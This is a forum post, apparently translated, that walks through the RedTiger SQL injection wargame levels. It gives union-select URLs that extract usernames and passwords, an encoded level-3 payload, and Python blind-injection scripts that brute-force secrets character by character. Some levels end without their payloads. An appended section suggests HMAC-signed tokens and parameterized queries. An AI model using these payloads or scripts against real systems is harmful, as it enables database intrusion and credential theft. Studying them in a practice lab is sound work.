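Resource Sharing Bar | E Language Forum | Reverse Engineering and Cracking Tutorials | Assist-Tool Development Tutorials | Network Security Tutorials | m.rigasin.com | My Development Tech Notes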
Title: write ctf injection
Author: miewang Time: 2015-8-16 21:18
Level 1
A perfectly ordinary injection level; just construct the statement directly.
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users
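Level 2
The challenge says it is a simple password bypass, so let's keep it simple and try the SQL "universal password".
Bypass succeeded.
Level 3
Trying to trigger an error... I'm speechless.
So let's trigger an error and have a look~
I tested whether it was SQLi, but no SQL error is echoed back, so I considered a PHP-side cause.
It was not until
that an error was finally displayed: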
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/hackit/urlcrypt.inc on line 21
Because .inc files like this one can be requested directly, we obtained part of the source code:
<?php
function encrypt($str)
{
    $cryptedstr = "";
    for ($i = 0; $i < strlen($str); $i++)
    {
        // XOR each byte with 192 and left-pad the decimal value to three digits
        $temp = ord(substr($str, $i, 1)) ^ 192;
        while (strlen($temp) < 3)
        {
            $temp = "0" . $temp;
        }
        $cryptedstr .= $temp . "";
    }
    return base64_encode($cryptedstr);
}

function decrypt($str)
{
    if (preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', $str))
    {
        $str = base64_decode($str);
        if ($str != "" && $str != null && $str != false)
        {
            $decStr = "";
            // Split the decoded digit string into three-digit groups
            for ($i = 0; $i < strlen($str); $i += 3)
            {
                $array[$i / 3] = substr($str, $i, 3);
            }
            foreach ($array as $s)
            {
                $a = $s ^ 192;
                $decStr .= chr($a);
            }
            return $decStr;
        }
        return false;
    }
    return false;
}
?>
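This file gives the encryption and decryption routines for the usr parameter, so we encrypt our statement with the same encryption routine and obtain the final PoC: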
https://redtiger.labs.overthewire.org/level3.php
?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjI0
Level 4
After clicking "Click me", the following was shown below:
Query returned 1 rows.
Adding a single quote changed it to
Query returned 0 rows.
So this should be blind injection.
order by shows that there are two columns, although that is not much use.. First, determine the length:
https://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword ,1 from level4_secret where length(keyword)=17
17 bytes in total, so this time it is definitely not an MD5...
Write a script that runs through A-Z a-z 0-9 to get the final result:
# -*- coding: utf-8 -*-
import string

import requests

s = requests.Session()
result = ""
login = {'password': 'dont_publish_solutions_GRR!',
         'level4login': 'Login'}
url = ("http://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword,1 "
       "from level4_secret where SUBSTR(keyword,%d,1)='%s'")
# Candidate characters in the same order as the original three loops: a-z, A-Z, 0-9
charset = string.ascii_lowercase + string.ascii_uppercase + string.digits

for x in range(1, 18):  # the keyword is 17 characters long; SUBSTR positions are 1-based
    for c in charset:
        r = s.post(url % (x, c), data=login)
        # A guess is taken as correct when the response contains "2 rows"
        if "2 rows" in r.text:
            result += c
            break
    print(result)
print(result)
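Level 5
Another login bypass. Several functions are disabled, and it is not blind injection; we are told to pay attention to the error messages.
Whether the login succeeds is decided by the number of rows in the final result, so our PoC
Level 6
Target: Get the first user in table level6_users with status 1
First query for status 1; it is just an ordinary injection, nothing difficult.
PoC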
https://redtiger.labs.overthewire.org/level6.php?user=0%20union%20select%201,0x2720756e696f6e2073656c65637420312c757365726e616d652c332c70617373776f72642c352066726f6d206c6576656c365f75736572732077686572652069643d33202d2d20,1,1,1%20from%20level6_users%20where%20status=1
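Level 7
Blind injection again, but this time it is in the search field and the restrictions are stricter, so we switch to a different keyword..
So we use the same approach as in one of the Levels above.
Time to write code again: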
# -*- coding: utf-8 -*-
import requests

s = requests.Session()
result = ""
login = {'password': 'dont_shout_at_your_disks***',
         'level7login': 'Login',
         'dosearch': 'search!'}
url = "http://redtiger.labs.overthewire.org/level7.php"

for x in range(1, 17):
    for i in range(32, 127):
        # Ask whether the first occurrence of chr(i) in news.autor is at position x (case-sensitive collation)
        login["search"] = "google%%' and locate('%s',news.autor COLLATE latin1_general_cs)=%d and '%%'='" % (chr(i), x)
        r = s.post(url, data=login)
        if "FRANCISCO" in r.text:
            result += chr(i)
            break
    print(result)
print(result)
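The code above seems to have a small problem.
Level 8
Adding a ' produced an error; this is clearly error-based.
Level 9
Still error-based.
A ' shows that the injection point is in the textarea, so we construct the statement accordingly.
Level passed.
Level 10
Only a Login button is given. Capturing the request, we see a base64-encoded JSON.
Decoding it gives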
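Added example for Level 3 (not part of the original post and not the challenge's own code): the urlcrypt.inc scheme uses a fixed constant rather than a key, so anyone who has seen the file can read and mint usr tokens. The Python port below sits next to an HMAC-signed alternative. SERVER_KEY, sign_usr and verify_usr are hypothetical names, and "guest" is a constructed sample value.

```python
import base64
import hashlib
import hmac
import re

XOR_KEY = 192  # fixed constant from the page's urlcrypt.inc; it is not a secret
SERVER_KEY = b"constructed-demo-key"  # assumption: a secret only the server holds


def encode_usr(plain):
    """Port of encrypt(): XOR each byte with 192, 3 decimal digits each, then base64."""
    digits = "".join("%03d" % (b ^ XOR_KEY) for b in plain.encode("latin-1"))
    return base64.b64encode(digits.encode("ascii")).decode("ascii")


def decode_usr(token):
    """Port of decrypt() with strict checks; returns None for malformed input."""
    if not re.fullmatch(r"[A-Za-z0-9/+]*={0,2}", token):
        return None
    try:
        digits = base64.b64decode(token, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    if not digits or len(digits) % 3 or not digits.isdigit():
        return None
    values = [int(digits[i:i + 3]) ^ XOR_KEY for i in range(0, len(digits), 3)]
    return bytes(values).decode("latin-1") if max(values) < 256 else None


def sign_usr(plain, key=SERVER_KEY):
    """Hypothetical hardened token: the value plus an HMAC-SHA256 tag over it."""
    tag = hmac.new(key, plain.encode("utf-8"), hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(f"{plain}|{tag}".encode("utf-8")).decode("ascii")


def verify_usr(token, key=SERVER_KEY):
    """Returns the value only when the tag verifies; None if forged or malformed."""
    try:
        plain, _, tag = base64.urlsafe_b64decode(token).decode("utf-8").rpartition("|")
    except (ValueError, UnicodeDecodeError):
        return None
    expected = hmac.new(key, plain.encode("utf-8"), hashlib.sha256).hexdigest()
    return plain if hmac.compare_digest(tag.encode("utf-8"), expected.encode("ascii")) else None


if __name__ == "__main__":
    sample = "guest"  # constructed value, not taken from the page
    print(encode_usr(sample), decode_usr(encode_usr(sample)))
    print(verify_usr(sign_usr(sample)), verify_usr(sign_usr(sample, key=b"someone-else")))
```

A signed token only stops clients from forging the parameter; the value must still reach the database through a parameterized query, because the injection itself is in how the query is built.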